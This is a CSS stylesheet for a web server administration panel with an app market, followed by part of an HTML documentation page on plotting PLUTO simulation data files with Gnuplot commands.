#login-dialog .button { margin-top: 14px; }
#bottom-box { padding: 8px 0; margin: 8px 16px; }
#bottom-box h2 { font-size: 16px; margin-bottom: 16px; }
#enterprise-box { width: 256px; float: right; }
#enterprise-notice { background: #fff url(/static/images/other/octality-logo.png) no-repeat top 30px; padding-top:64px; }
#enterprise-link { text-align: right; margin-top: 16px; color: #def; }
#proud-users { background: transparent url(/static/images/other/proud.png) no-repeat right top; padding-right: 32px; }
#proud-link { text-align: right; margin-top: 8px; color: #def; }
#proud-link a { margin: 0 4px; }
#proud-a { cursor: pointer; text-decoration: underline; }
#latest-release-box { background: transparent url(/static/images/other/latest.png) no-repeat right top; padding-right: 32px; }
.infosection { border-bottom: 1px solid #def; padding-bottom: 8px; padding-left: 30px; margin-bottom: 8px; }
.infosection table { width: 100%; }
.infosection th { width: 144px; padding: 4px; vertical-align: top; }
.infosection td { padding: 4px; }
.info-table th { width: 112px; padding: 4px; border-bottom: 1px dotted #def; }
.info-table td { padding: 4px 0 4px 4px; text-align: right; border-bottom: 1px dotted #def; }
#server-section { background: transparent url(/static/images/information.png) 2px 2px no-repeat; margin-top: 16px; }
#server-section td { padding: 0; padding-right: 20px; }
#server-section .info-table td { padding: 4px 0 4px 4px; }
.infosection th { width: 144px; padding: 4px; vertical-align: top; }
#host-section { background: transparent url(/static/images/host.png) 2px 2px no-repeat; }
#remote-services-section { background: transparent url(/static/images/remote.png) 2px 2px no-repeat; }
#remote-services-section td { padding: 3px 20px 0 0; }
#remote-services-section .info-table th { padding: 0; border: 0; width: 40%; vertical-align: top; }
#remote-services-section .info-table td { padding: 0; border: 0; width: 60%; vertical-align: top; }
#remote-services-section .notice { padding: 0; margin: 0; }
#remote-services-section span { display: block; margin-top: 4px; }
#remote-backup-section { background: transparent url(/static/images/backup.png) 2px 2px no-repeat; }
#cpu-section { background: transparent url(/static/images/cpu.png) 2px 2px no-repeat; }
#ram-section { background: transparent url(/static/images/ram.png) 2px 2px no-repeat; }
#disk-section { background: transparent url(/static/images/disk.png) 2px 2px no-repeat; }
#uptime-section { background: transparent url(/static/images/uptime.png) 2px 2px no-repeat; }
#net-section { background: transparent url(/static/images/network.png) 2px 2px no-repeat; }
.infosection .progressbar { width: 408px; float: left; }
.infosection .progress-details { width: 32px; float: left; padding-left: 16px; text-align: right; }
#ram-section .progressbar, #ram-section .progress-details { margin-top: 8px; }
.infosection .ram-text { float: left; width: 192px; }
.infosection .progress-extra { color: #666; float: right; text-align: right; }
.ui-dialog .error { margin-bottom: 4px; }
#login-bottom .register-link { float: left; display: block; width: 168px; padding-top: 6px; font-size: 90%; }
#support-box ul li { margin-bottom: 4px; padding-left: 0px; color: #def; list-style-type:square; list-style-position: inside; }
#support-box ul li:hover { color: #cde; }
#announcements-box ul li { border-bottom: 1px dotted #def; padding:4px 0; margin: 4px 0;}
.tweet-date { display: block; text-align: right; color: #aaa; font-size: 80%; margin-top: 4px;}
#twitter-link { background: #fff url(/static/images/other/twitter.png) no-repeat; padding: 4px 0 0 24px; margin-top: 16px; height: 24px;}
#launch-button {
float: right;
font-size: 10px;
padding: 2px 6px;
color: #fff;
font-weight: normal;
margin: 0;
}
.button-start {
border: 1px solid #2e8f28;
text-shadow: #2e8f28 0px 1px 0px;
background: #2fa42c;
background: -webkit-gradient(linear, left top, left bottom, from(#7ac25a), to(#2fa42c));
background: -moz-linear-gradient(top, #7ac25a, #2fa42c);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#7ac25a', endColorstr='#2fa42c');
-moz-box-shadow: inset 1px 1px 0 rgba(255,255,255,0.4);
-webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,0.4);
box-shadow: inset 1px 1px 0 rgba(255,255,255,0.4);
}
.button-start:active {
-moz-box-shadow: inset 0 1px 4px #2fa42c;
-webkit-box-shadow: inset 0 1px 4px #2fa42c;
box-shadow: inset 0 1px 4px #2fa42c;
}
.button-stop {
border: 1px solid #c00;
text-shadow: #c00 0px 1px 0px;
background: #cc0000;
background: -webkit-gradient(linear, left top, left bottom, from(#ff8888), to(#cc0000));
background: -moz-linear-gradient(top, #ff8888, #cc0000);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff8888', endColorstr='#cc0000');
-moz-box-shadow: inset 1px 1px 0 rgba(255,255,255,0.4);
-webkit-box-shadow: inset 1px 1px 0 rgba(255,255,255,0.4);
box-shadow: inset 1px 1px 0 rgba(255,255,255,0.4);
}
.button-stop:active {
-moz-box-shadow: inset 0 1px 4px #c00;
-webkit-box-shadow: inset 0 1px 4px #c00;
box-shadow: inset 0 1px 4px #c00;
}
#community-bar { padding: 32px 16px; margin-bottom: 32px; width: 500px; }
#community-bar h3 { color: #79b; float: left; padding-top: 4px; font-size: 14px; height: 16px; font-weight: normal; }
#community-bar ul { float: left; margin: 2px 0 0 4px; }
#community-bar ul li { float: left;}
#community-bar ul li a { display: block; height: 16px; padding: 0 4px; }
/* Page Status
*/
#grapharea .submitter { float: right; position: absolute; top: 120px; width: 700px; }
.graph_type { float: right; }
.graph_props_bottom {position: absolute; top: 450px;}
.graph_props_top {position: absolute; top: -35px;}
/* About
*/
#about { text-align: left; }
#about #version { position: absolute; top: 56px; right: 40px; color: #79b;}
#about #license { height: 256px; border: 1px solid #fff; }
#about #license #license-text { height: 224px; overflow: scroll; overflow-x: hidden; border: 1px solid #cde; padding: 16px 8px; }
#about #license #license-text a { color: #000; text-decoration: none; }
#about #license #license-text h3 { margin: 0; padding: 0; }
#about #license #license-text pre { margin-bottom: 16px; }
#about #copyright { height: 256px; border: 1px solid #fff; }
#about #copyright h2 { margin-bottom: 8px; padding-bottom: 4px; }
#about #copyright table td { width: 50%; padding-left: 10px; padding-right: 10px; vertical-align: top; }
#about #copyright ul { padding-left: 15px; }
#about #copyright ul li { list-style-type: square; list-style-position: inside; }
#copyright-notice { text-align: center; margin: 32px 0 0 0; font-weight: bold; color: #79b; }
/* General
*/
.icon-button { padding: 8px; }
.icon-button button { font-size: 10px; padding: 2px 6px;}
/* Panel buttons */
.panel-buttons { height: 24px; float: right; }
.panel-button { width: 24px !important; height: 24px; padding: 0 !important; margin: 6px 2px 2px 2px !important; }
/* Market
*/
#body-market #main { background: transparent url(/static/images/sidebar-market.png) right top repeat-y; }
#body-market #top-box { background: #fff; }
#body-market p { margin-bottom: 1em; }
#body-market #help { display: none; }
#market-container { overflow: auto; overflow-x: hidden; margin: 0; }
.market-main-area { width: 700px; float: left; padding: 0; background-color: #fff; margin: 16px 0 32px 0; padding-bottom: 32px; }
.market-main-area h2 { padding-left: 16px; border: none; }
.market-search-box { margin: 0; padding: 0 8px; float: right; }
.market-search-box input { width: 208px; }
.market-search-box .notice { display: none; }
.market-sidebar { width: 208px; float: left; margin: 16px 0 0 22px; padding-left: 8px; }
.market-sidebar h3 { border: none; color: #259; font-size: 120%; padding: 0; margin: 0 0 8px 0; text-shadow: #fff 0px 1px 0px;}
.market-sidebar .market-categories-list { padding: 0; }
.market-sidebar .market-categories-list li { padding-bottom: 4px; }
.market-featured-box {
background: transparent url(/CTK/images/loader.gif) no-repeat center center;
margin: 0 8px 16px 16px;
border: 1px solid #cde;
height: 240px;
}
.market-featured-box-content {
width: 480px;
background: #fff;
float: left;
}
.market-featured-box-content h2 {
color: #79b;
font-size: 14px;
}
.market-app-featured {
}
.market-app-featured-icon {
margin: 8px 16px;
float: left;
}
.market-app-featured-icon img { width: 144px; }
.market-app-featured-name {
font-size: 140%;
margin-left: 152px;
padding-top: 8px;
}
.market-app-featured-name a {
font-weight: bold;
}
.market-app-featured-category {
font-size: 90%;
color: #666;
margin-left: 152px;
}
.market-app-featured-score {
height: 16px;
margin-top: 4px;
margin-top: 8px;
float: right;
}
.market-app-featured-summary {
margin-left: 152px;
margin-top: 8px;
width: 304px;
}
.market-featured-box-list {
background: transparent url(/static/images/featured-list-bg.png) repeat-y;
float: right;
width: 193px;
height: 240px;
overflow: hidden;
}
.market-featured-box-list li {
height: 32px;
padding: 8px 8px 8px 17px;
display: block;
}
.market-featured-box-list li:hover {
cursor: pointer;
}
.market-featured-box-list li.selected {
border-right: 3px solid #27c;
background: #fff url(/static/images/featured-list-selected.png) repeat-y;
}
.featured-list-icon img {
width: 32px;
height: 32px;
float: left;
padding-right: 8px;
}
.featured-list-name {
color: #27c;
font-weight: bold;
text-shadow: #fff 0px 1px 0px;
display: block;
}
.featured-list-category {
font-size: 90%;
color: #cde;
display: block;
}
.market-app-entry {
padding-left: 8px;
padding-bottom: 16px;
margin-bottom: 16px;
border-bottom: 1px dotted #cde;
min-height: 112px;
}
.ui-tabs-panel .market-app-entry { padding-left: 0px;}
.market-app-entry-icon {
margin: 8px 16px 8px 8px;
float: left;
}
.market-app-entry-icon img { width: 96px; }
.market-app-entry-name {
font-size: 140%;
margin-left: 120px;
padding-top: 8px;
}
.market-app-entry-name a {
font-weight: bold;
}
.market-app-entry-category {
font-size: 90%;
color: #666;
margin-left: 120px;
}
.market-app-entry-score {
height: 16px;
margin-top: 8px;
float: right;
}
.market-app-entry-price {
margin-top: 3px;
margin-right: 8px;
float: right;
}
.market-app-entry-summary {
margin-left: 120px;
margin-top: 8px;
width: 544px;
}
.market-menu {
height: 16px;
color: #27c;
font-weight: normal;
z-index: 9000;
padding-left: 8px;
width: 700px;
margin-bottom: 16px;
}
.market-menu-sep, .market-menu-item {
float: left;
padding-left: 8px;
}
#body-market-app .market-main-area {
width: 928px;
}
#body-market-app #top-box { background: #fff; }
.market-app-desc {
padding-left: 16px;
}
.market-app-desc .ui-tabs-panel {
height: 480px;
max-height: 480px;
overflow: auto;
border: 1px solid #cde;
border-top: 0;
margin-bottom: 32px;
}
#refreshable-market-app-reviews {
padding-left: 16px;
}
.market-app-desc-icon {
width: 144px;
margin: 8px 16px 8px 8px;
float: left;
}
.market-app-desc-icon img { width: 144px; }
.market-app-desc-title {
margin-left: 168px;
font-size: 140%;
padding-top: 8px;
color: #259;
}
.market-app-desc-buy {
margin-top: 8px;
width: 192px;
text-align: center;
float: right;
margin-right: 8px;
}
.market-app-desc-buy button {
width: 192px;
font-size: 18px;
margin: 0 0 8px 0;
}
.market-app-desc-buy button[disabled=True],
.market-app-desc-buy button[disabled=True]:active {
color: #def;
background: #f7fbff;
border: 1px solid #def;
}
.market-app-desc-support-box {
float: right;
width: 160px;
margin: 0;
}
.market-support-box h3 {
padding: 16px 0 8px 0;
color: #000;
}
.market-support-entry {
padding: 4px 4px 4px 20px;
}
.market-support-entry.supported {
background: transparent url('/CTK/images/tick.png') 0 2px no-repeat;
}
.market-support-entry.unsupported {
background: transparent url('/CTK/images/del.png') 1px 3px no-repeat;
color: #cde;
}
.amount, .currency, .free {
float: left;
font-weight: bold;
padding-right: 4px;
margin-top: 8px;
}
.free { color: #0b0; }
.market-app-desc-version, .market-app-desc-url, .market-app-desc-category {
margin-left: 168px;
color: #666;
font-size: 90%;
}
.market-app-desc-short-desc {
margin-left: 168px;
margin-top: 8px;
width: 512px;
min-height: 78px;
margin-bottom: 16px;
}
.market-app-desc-description {
margin: 16px 0 32px 0;
width: 672px;
float: left;
}
.market-app-desc-description p {
margin-bottom: 1em;
}
.market-app-desc-description ul {
margin-left: 2em;
}
.market-app-desc-description ul li {
margin-bottom: 4px;
list-style-type:disc;
margin-bottom: 1em;
}
.market-commands-exec-error-details {
height: 168px;
overflow: auto;
}
.market-commands-exec-command {
font-size: 9px;
color: #333;
}
.carousel {
margin-bottom: 32px;
}
.carousel .controls {
}
.carousel .prev { float: left; }
.carousel .next { float: right; }
.carousel .overview {
background: #fff;
width: 668px;
height: 480px;
overflow: hidden;
display: table-cell;
vertical-align: middle;
text-align:center;
float: left;
}
.carousel .arrows {
height: 16px;
width: 166px;
float: right;
margin: 0 8px 0 8px;
}
.carousel .pager {
float: right;
font-size: 9px;
width: 180px;
height: 416px;
}
.carousel .pager li {
font-size: 1px;
color: #fff;
float: left;
padding: 0 1px 1px 1px;
margin-right: 8px;
color: #fff;
background: #fff;
margin: 4px;
}
.carousel .pager li a { color: #fff; }
.carousel .pager li a:hover { text-decoration: none; cursor: pointer; color: #fff; }
.carousel .pager li.selected { background: #27c; color: #27c; }
.arrows .prev, .arrows .next {
height: 16px;
text-indent: -9999px;
color: #fff;
width: 11px;
margin-top: 2px;
}
.xcarousel-thumbs img { width: 72px; height: 54px; border: 1px solid #cde; }
.carousel-thumbs img { width: 76px; height: 58px; border: 1px solid #cde; }
.carousel .pager li.selected img { border: 1px solid #27c; }
.carousel .prev:hover, .carousel .next:hover { cursor: pointer; }
.carousel .prev { background: transparent url('/static/images/other/left.png') no-repeat; }
.carousel .next { background: transparent url('/static/images/other/right.png') no-repeat; }
.paginator-counter { text-align: right; color: #cde; clear: both; height: 16px; }
.paginator-footer { margin-top: 16px; padding-top: 16px; height: 24px; text-align: center; clear: both; }
.paginator-footer a { text-decoration: underline; }
.paginator-footer-prev { padding-right: 8px; }
.paginator-footer-next { padding-left: 8px; }
.market-no-reviews { padding: 16px; }
.market-app-review { border-bottom: 1px dotted #cde; padding: 8px 0; }
.market-app-review-score {
width: 88px;
height: 16px;
float: left;
}
.market-app-review-title {
font-weight: bold;
padding-top: 3px;
height: 16px;
}
.market-app-review-name { float: left; margin-right: 3px; }
.market-app-review-stamp { color: #666; }
.market-app-review-comment { margin: 8px 0; }
#button-review { float: right; margin-top: 8px; }
.title-text { margin-top: 8px; font-weight: bold; }
.review-text { margin-top: 8px; font-weight: bold; }
.rating-text { font-weight: bold; float: left; margin-top: 16px; padding-right: 4px; }
.druid-review-title { width: 432px !important; }
.druid-review-review { width: 432px; height: 128px; }
.druid .star-rating { margin: 14px 4px; }
.market-app-review-signin { float: right; margin-top: 8px; padding: 12px; color: #b5c8db; }
#refreshable-search-results { padding-left: 16px; }
.market-my-library { margin-top: 16px; }
.market-my-library-item { height: 32px; margin-bottom: 8px; }
.market-my-library-icon { height: 32px; width: 32px; float: left; }
.market-my-library-icon img { height: 32px; width: 32px; }
.market-my-library-name { float: left; padding: 8px; }
.collapsible { margin-bottom: 32px; clear: both; min-height: 16px; }
.collapsible-title { float: right; color: #27c; }
.collapsible-title:hover { color: #c00; }
.error-h2 { color: #c00; margin-bottom: 8px; }
.error-title { font-weight: bold; font-size: 120%; }
.error-message { margin: 8px 0 16px 0; }
.error-comments { height: 128px; width: 560px; }
.error-report-box { height: 32px; text-align: right; margin-top: 8px; }
.error-report-box .button { float: none; }
.error-report-box .button:active { padding: 6px 8px; }
.error-thanks { width: 100%; margin-top: 80px; text-align: center; }
.error-thanks button { margin-top: 80px; }
/* Page general */
#body-general .ui-tabs-panel {
overflow: auto;
overflow-x: hidden;
}
.mime_types h2 {
border: none;
}
.mime_types .button {
float: right;
}
.mimetable {
border-collapse: collapse;
border: 1px solid #cde;
}
.mimetable thead th { width: 480px; }
.mimetable thead th + th { width: 260px; }
.mimetable thead th + th + th { width: 140px; }
.mimetable thead th + th + th + th { width: 32px; }
.mimetable thead tr { position: relative; display: block; }
.mimetable tbody {
display: block;
overflow: auto;
width: 100%;
}
.mimetable tbody td { width: 480px; }
.mimetable tbody td input { width: 90%; }
.mimetable tbody td + td { width: 260px; }
.mimetable tbody td + td + td { width: 140px; }
.mimetable tbody td + td + td + td { width: 16px; }
.mimetable th {
background: #e6f3ff url(/static/images/bg-th.png) repeat-x;
border: none;
border-bottom: 2px solid #27c;
padding: 8px 4px;
}
.mimetable td {
padding: 6px 4px;
background: #fff;
border-bottom: 1px solid #def;
}
/* Page Advanced */
#body-advanced .ui-tabs-panel {
overflow: auto;
overflow-x: hidden;
}
/* Save dialog */
#buttons .submitter {
width: 148px;
margin: 16px 0 0 4px;
float: left;
}
#buttons .submitter .button {
width: 120px;
}
#buttons #saved-no-running { width: 300px; }
/* Dialog with selection panel */
.ui-dialog .selection-panel {
background: #fff;
width: 240px;
height: 320px;
border: 1px solid #cde;
float: left;
}
.ui-dialog .selection-panel .row_content .title {
font-weight: bold;
}
.ui-dialog .vserver_new_content,
.ui-dialog .rule_new_content {
background: #fff;
width: 432px;
height: 320px;
float: right;
border: 1px solid #cde;
overflow: auto;
overflow-x: hidden;
}
.ui-dialog .vserver_new_content .submitter,
.ui-dialog .rule_new_content .submitter,
.ui-dialog .rule_new_content .propstable {
padding: 8px;
}
.ui-dialog .vserver_new_content .ui-dialog-buttonpane { border: none; }
.wizard-list li {
border-bottom: 1px solid #cde;
height: 56px;
}
.wizard-list li .logo {
width: 48px;
float: left;
margin: 2px 8px;
}
.wizard-list li .title {
padding-top: 8px;
font-weight: bold;
font-size: 14px;
}
.wizard-list li .descr {
color: #666;
}
.wizard-descr.wizard-icon { float: left; margin: 8px; }
.wizard-welcome { padding-left: 64px; }
#dialog-new-vserver,
#dialog-new-rule {
background-color: #f0f7ff;
}
#error-redirection {
table-layout: fixed;
border-collapse: collapse;
border: 1px solid #cde;
margin-bottom: 32px;
}
#error-redirection th {
background: #e6f3ff url(/static/images/bg-th.png) repeat-x;
border: none;
border-bottom: 2px solid #27c;
padding: 8px 4px;
}
#error-redirection td {
border-bottom: 1px solid #cde;
padding: 4px;
}
#error-redirection th { width: 100px; }
#error-redirection th+th { width: 338px; }
#error-redirection th+th+th { width: 200px; }
#error-redirection th+th+th+th { width: 32px; }
#error-redirection td { width: 100px; }
#error-redirection td+td { width: 338px; }
#error-redirection td+td+td { width: 200px; }
#error-redirection td+td+td+td { width: 32px; text-align: center; }
#balancer-table {
table-layout: fixed;
border-collapse: collapse;
width: 620px;
border: 1px solid #cde;
margin-bottom: 32px;
}
#balancer-table th {
background: #e6f3ff url(/static/images/bg-th.png) repeat-x;
border: none;
border-bottom: 2px solid #27c;
padding: 8px 4px;
}
#balancer-table td {
border-bottom: 1px solid #cde;
padding: 4px;
}
#balancer-table th { width: 300px; }
#balancer-table th+th { width: 288px; }
#balancer-table th+th+th { width: 32px; }
#balancer-table td { width: 300px; }
#balancer-table td+td { width: 288px; }
#balancer-table td+td+td { width: 32px; }
#authlist-table {
table-layout: fixed;
border-collapse: collapse;
width: 620px;
border: 1px solid #cde;
margin-bottom: 32px;
}
#authlist-table th {
background: #e6f3ff url(/static/images/bg-th.png) repeat-x;
border: none;
border-bottom: 2px solid #27c;
padding: 8px 4px;
}
#authlist-table td {
border-bottom: 1px solid #cde;
padding: 4px;
}
#authlist-table th { width: 300px; }
#authlist-table th+th { width: 288px; }
#authlist-table th+th+th { width: 32px; }
#authlist-table td { width: 300px; }
#authlist-table td+td { width: 288px; }
#authlist-table td+td+td { width: 32px; }
#halt-admin-box { text-align: center; padding-top: 64px; }
#halt-admin-box a { color: #b5c8db; font-size: 90%; }
#halt-admin-box a:hover { color: #c00; }
#market_maintenance_box {
background: #fff2b3 url(/CTK/images/dialog-warning.png) 4px 4px no-repeat;
-moz-border-radius: 4px; -webkit-border-radius: 4px;
border: 1px solid #b90;
padding: 1em 1em 1em 40px;
margin: 1em 0;
}
#market_maintenance_box h3 {
color: #000;
}
#maintenance-removal { overflow: auto; overflow-x: hidden; height: 260px; }
#maintenance-removal-list { table-layout: fixed; width: 100%; border-collapse: collapse; border: 1px solid #cde; }{}
#maintenance-removal-list th { background: #e6f3ff url(/static/images/bg-th.png) repeat-x; border: none; border-bottom: 2px solid #27c; padding: 8px 4px; }
#maintenance-removal-list td { border-bottom: 1px solid #cde; padding: 4px; }
#body-new-config h2 { border: 0; }
#body-new-config .dialog-warning { margin: 0 16px; }
#body-new-config .create-box {
text-align: center;
height: 152px;
width: 272px;
border: 1px solid #cde;
padding: 8px;
margin: 0 8px;
float: left;
-moz-border-radius: 4px; -webkit-border-radius: 4px;
background-color: #f8fcff;
}
#body-new-config .create-box:hover {
background-color: #fff;
}
#body-new-config h3 {
color: #27c;
font-size: 22px;
margin: 8px;
height: 50px;
display: table-cell;
width: 272px;
vertical-align: middle;
}
#body-new-config span {
display: block;
height: 40px;
margin: 8px 0;
}
#body-new-config .create-box button {
position: relative;
bottom: 8px;
font-size: 16px;
width: 128px;
}
.balancer-sources-sortable td, .balancer-sources-sortable th { width: 500px; height: 24px; }
|
Tools/Gnuplot/Doc/index.html | JohannesBuchner/PLUTO | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Untitled</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
<style type="text/css">
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: 64px;}
.ws72 {font-size: 96px;}
.wpmd {font-size: 13px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;}
/*----------Para Styles----------*/
DIV,UL,OL /* Left */
{
margin-top: 0px;
margin-bottom: 0px;
}
</style>
</head>
<body>
<div id="table1" style="position:absolute; overflow:hidden; left:15px; top:90px; width:776px; height:5200px; z-index:0">
<div class="wpmd">
<div><TABLE bgcolor="#FFFFFF" border=0 bordercolorlight="#000000" bordercolordark="#969696" cellspacing=1>
<TR valign=top>
<TD width=761><div class="wpmd">
<div align=justify><font face="Verdana">PLUTO data files written with the tabulated (</font><font face="Courier"><B>*.tab</B></font><font face="Verdana">) or binary data formats (</font><font face="Courier"><B>*.dbl</B></font><font face="Verdana"> or </font><font face="Courier"><B>*.flt</B></font><font face="Verdana">) can be visualized with Gnuplot. At present, visualization capabilities apply to 1D or moderately-sized 2D datasets. </font></div>
<div align=justify><font face="Verdana">Tabulated (Ascii) data files have the advantage of incorporating grid information although they tend to rapidly increase in size for large numbers of grid points and cannot be used in parallel computations.</font></div>
<div align=justify><font face="Verdana">Binary data files do not embed grid information and extra information must be given at the command line. They are, however, a more efficient format for larger amount of data.</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div><font face="Verdana" class="ws12"><B><U>Ascii Data Files (.tab)</U></B></font></div>
<div><font face="Verdana" class="ws12"><BR></font></div>
<div align=justify><font face="Verdana">One-dimensional tabulated ascii data files can be plotted using the </font><font color="#3366FF" face="Courier"><B>plot</B></font><font face="Verdana"> command. </font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div align=justify><font face="Verdana">If you enabled the </font><font face="Courier"><B>.tab</B></font><font face="Verdana"> output format in </font><font face="Courier"><B>pluto.ini</B></font><font face="Verdana">, you can plot 1D data from, e.g., the first output file by typing</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div><font color="#0000FF" face="Courier">gnuplot> plot "data.0001.tab" u 1:3 title "Density"</font></div>
<div><font color="#0000FF" face="Courier">gnuplot> replot "data.0001.tab" u 1:5 title "Pressure" # overplot </font></div>
<div><font color="#0000FF" face="Courier"><BR></font></div>
<div align=justify><font face="Verdana">Here the first column corresponds to the x coordinate, the second column to the y coordinate and flow data values start from the third column. The name and order of the variables is the same given in </font><font face="Courier"><B>tab.out</B></font><font face="Terminal"> </font><font face="Verdana">log file (e.g. rho = 3, vx1 = 4, prs = 5). The figure below shows the density and pressure profiles for the Sod shock tube problem (conf. #03 in </font><font face="Courier"><B>Test_Problems/HD/Sod</B></font><font face="Verdana">) and it has been obtained with the previous commands.</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div align=justify><font face="Verdana"><BR></font></div>
<div><IMG border=0 width=625 height=374 src="images/sod_plot.PNG"></div>
<div align=justify><font face="Verdana">Two-dimensional ascii datafiles can be visualized using the </font><font color="#3366FF" face="Courier"><B>splot</B></font><font face="Verdana"> ommand. The next figure shows a simple contour drawing of density at the final time step of the Mach reflection test problem (remember to enable </font><font face="Courier"><B>tab</B></font><font face="Verdana"> output in </font><font face="Courier"><B>pluto.ini</B></font><font face="Verdana">). Contour levels range from 0.1 to 20 and are spaced by 0.2. The following commands have been used:</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761 height=140><div class="wpmd">
<div><font color="#0000FF" face="Courier"><BR></font></div>
<div><font color="#0000FF" face="Courier">gnuplot> set contour </font></div>
<div><font color="#0000FF" face="Courier">gnuplot> set cntrparam level incremental 0.1,0.2,20 </font></div>
<div><font color="#0000FF" face="Courier">gnuplot> set view map</font></div>
<div><font color="#0000FF" face="Courier">gnuplot> unset surface</font></div>
<div><font color="#0000FF" face="Courier">gnuplot> unset key</font></div>
<div><font color="#0000FF" face="Courier">gnuplot> splot "data.0001.tab" u 1:2:3 w lines</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761 height=140><div class="wpmd">
<div><IMG border=0 width=666 height=282 src="images/dmr_contour.PNG"></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div align=justify><font face="Verdana">Here </font><font face="Courier"><B>using 1:2:3</B></font><font face="Verdana"> tells gnuplot to take columns 1, 2 for x and y and the third column as the data value to be contoured (density in this case).</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font face="Verdana">Instead of contour levels, the pm3d style can be employed to draw colored map. In this case the same data set can be displayed using</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div><font color="#0000FF" face="Courier"><BR></font></div>
<div><font color="#0000FF" face="Courier">gnuplot> reset</font></div>
<div><font color="#0000FF" face="Courier">gnuplot> set pm3d map </font></div>
<div><font color="#0000FF" face="Courier">gnuplot> set title "Double Mach Reflection"</font></div>
<div><font color="#0000FF" face="Courier">gnuplot> splot "data.0001.tab" u 1:2:3 </font></div>
<div><font face="Verdana"><BR></font></div>
<div><font face="Verdana">The result is shown in the figure below</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div><IMG border=0 width=699 height=274 src="images/dmr_pm3d.PNG"></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div><BR></div>
<div><font face="Verdana">Different colortables may be constructed by specifying the colors directly, e.g.</font></div>
<div><font face="Verdana"><BR></font></div>
<div><font color="#0000FF" face="Courier">gnuplot> set palette defined (0 'black', 1 'blue', 2 'red')</font></div>
<div><font color="#0000FF" face="Courier">gnuplot> replot</font></div>
<div><font face="Courier"><BR></font></div>
<div align=justify><font face="Verdana">defines a colormap that linearly changes between black, blue and red (use </font><font color="#0000FF" face="Courier"><B>show palette colornames</B></font><font face="Verdana"> to list the available colormap names). Have a look at </font><font face="Verdana"><a href="http://gnuplot.sourceforge.net/demo/pm3dcolors.html" title="" target="_blank">http://gnuplot.sourceforge.net/demo/pm3dcolors.html</a></font><font face="Verdana">.</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font face="Verdana"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div align=justify><font face="Verdana" class="ws12"><B><U>Binary Data Files (.flt and .dbl)</U></B></font></div>
<div align=justify><font face="Verdana" class="ws12"><BR></font></div>
<div align=justify><font face="Verdana">Starting with Gnuplot 4.2, raw binary files are also supported. However, grid information is not automatically included and must be supplied separately.</font></div>
<div align=justify><font face="Verdana"><BR></font></div>
<div align=justify><font face="Verdana">2D multiple data files (</font><font face="Courier"><B>multiple_files</B></font><font face="Verdana"> for </font><font face="Courier"><B>.dbl</B></font><font face="Verdana"> or .</font><font face="Courier"><B>flt</B></font><font face="Verdana"> outputs) can be plotted by specifying the array dimension and the data format to </font><font color="#0000FF" face="Courier"><B>splot</B></font><font face="Verdana">. This is done with the keyword </font><font color="#0000FF" face="Courier"><B>array</B></font><font face="Verdana"> and </font><font color="#0000FF" face="Courier"><B>format</B></font><font face="Verdana">. As an example, in order to display the y-component of velocity from a 2D array with </font><font face="Courier"><B>200x200</B></font><font face="Terminal"> </font><font face="Verdana">points in double precision you can use</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div><BR></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> set pm3d map</font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> splot "vx2.0010.dbl" binary array=200x200 format="%double"</font></div>
<div align=justify><font color="#0000FF" face="Courier"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761 height=34><div class="wpmd">
<div><BR></div>
<div align=justify><font face="Verdana">where </font><font color="#0000FF" face="Courier"><B>array=200x200</B></font><font face="Courier"><B> </B></font><font face="Verdana">means that the underlying array structure has </font><font face="Courier"><B>200x200</B></font><font face="Verdana"> points.</font></div>
<div align=justify><font face="Verdana">If data have been saved as </font><font face="Courier"><B>single_file</B></font><font face="Verdana">, you can select the variable to display by skipping the appropriate number of bytes through the </font><font color="#0000FF" face="Courier"><B>skip=()</B></font><font face="Verdana"> function:</font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761><div class="wpmd">
<div><BR></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> set pm3d map</font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> nvar = 2 # 2 = y-velocity</font></div>
<div align=justify><font color="#0000FF" face="Courier">gnuplot> splot "data.0010.dbl" bin array=200x200 format="%lf" skip=(200*200*8*nvar)</font></div>
<div align=justify><font color="#0000FF" face="Courier"><BR></font></div>
</div>
</TD>
</TR>
<TR valign=top>
<TD width=761 height=43><div class="wpmd">
